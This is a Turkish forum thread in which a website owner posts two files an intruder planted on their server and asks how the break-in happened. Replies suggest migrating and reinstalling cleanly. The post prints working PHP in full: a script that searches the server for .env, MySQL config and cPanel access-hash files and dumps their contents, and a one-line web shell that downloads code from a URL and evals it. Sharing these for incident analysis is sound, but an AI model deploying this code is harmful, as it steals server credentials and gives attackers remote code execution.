• 12-09-2021, 02:37:37
    #1
    Arkadaşlar merhaba,
    Uzun zamandır bir sorunum yoktu. Bi ara uğraşan olmuştu onu temizlemiştim. Sonra dosyaların değiştirme tarihini tespit eden bir dosya attım roota ve oradan takip ediyordum. Birisinin benim siteme aşağıdaki kodları içeren iki kodu atarak sızdığını farkettim. Bundan öncesinde başka dosya yok. Sizce açık nerededir?

    Dosya içerikleri;
    <?php
    $asu    = shell_exec("find / -name *.env | grep -v 'Permission denied'");
    $asu1    = shell_exec("find / -name *.my.cnf | grep -v 'Permission denied'");
    $asu2    = shell_exec("find / -name *.accesshash | grep -v 'Permission denied'");
    echo '<font color=purple>r00t@trenggalek6etar:</font>~/pwnedz$</font><br>';
    echo 'DIR : <font color=red>'.getcwd().'</font><br>';
    echo '<textarea name="jembot" cols="150" rows="10" id="jembot">'.$asu.''.$asu1.''.$asu2.'</textarea><br>';
    $fh = fopen('filene.txt', 'w');
    fwrite($fh,$asu);
    system("sed 's/^/cat /;' filene.txt > gas.sh");
    $response = shell_exec("chmod +x gas.sh; bash gas.sh");
    echo '<textarea name="jembot" cols="150" rows="10" id="jembot">'.$response.'</textarea><br>';
    ?>
    <?php
    if(isset($_POST['delete']))
        {
            unlink(__FILE__);
            unlink("filene.txt");
            unlink("gas.sh");
            echo "sukses bro";
        }
    ?>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
    <html>
        <body>
            <form action="suw.php" method="post">
                <p>
                <button type="delete" name="delete" id="delete" value="delete">Raimu</button>
                </p>
            </form>
        </body>
    </html>
    [B][/B]
    IDBTE4M <?php $ch = curl_init($_GET['idb']);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval('?>'.$result); ?>


    İlk paylaştığım dosyayı sunucuda çalıştırınca bu ekran geliyor;
  • 12-09-2021, 02:41:44
    #2
    Atılan dosyadaki kodlarla açığın kaynağı tespit edilemez. Sunucuya ve yazılıma bakılıp shell taraması yapmak gerekir.
  • 12-09-2021, 02:44:47
    #3
    Risque adlı üyeden alıntı: mesajı görüntüle
    Atılan dosyadaki kodlarla açığın kaynağı tespit edilemez. Sunucuya ve yazılıma bakılıp shell taraması yapmak gerekir.
    Reseller kullanıyorum nasıl yapabilirim bunu?
  • 12-09-2021, 03:52:24
    #4
    Geçmiş olsun. Kullandığınız tema ve eklentiler vvarez değilse yapacağınız en iyi hamle, sunucu değiştirmek, sitenizin sadece yazı ve resimlerini yedekleyip yeni sunucuda sıfır db, veritabanı ve kullanıcı adlarıyla yeniden kurmak olacaktır. Dosya kaldırıp, sileyim, vs. ile olacak işler değil bence. Kullandığınız tema yada eklentilere güvenmiyorsanız yeni kurulumda artık onları kullanmayın derim.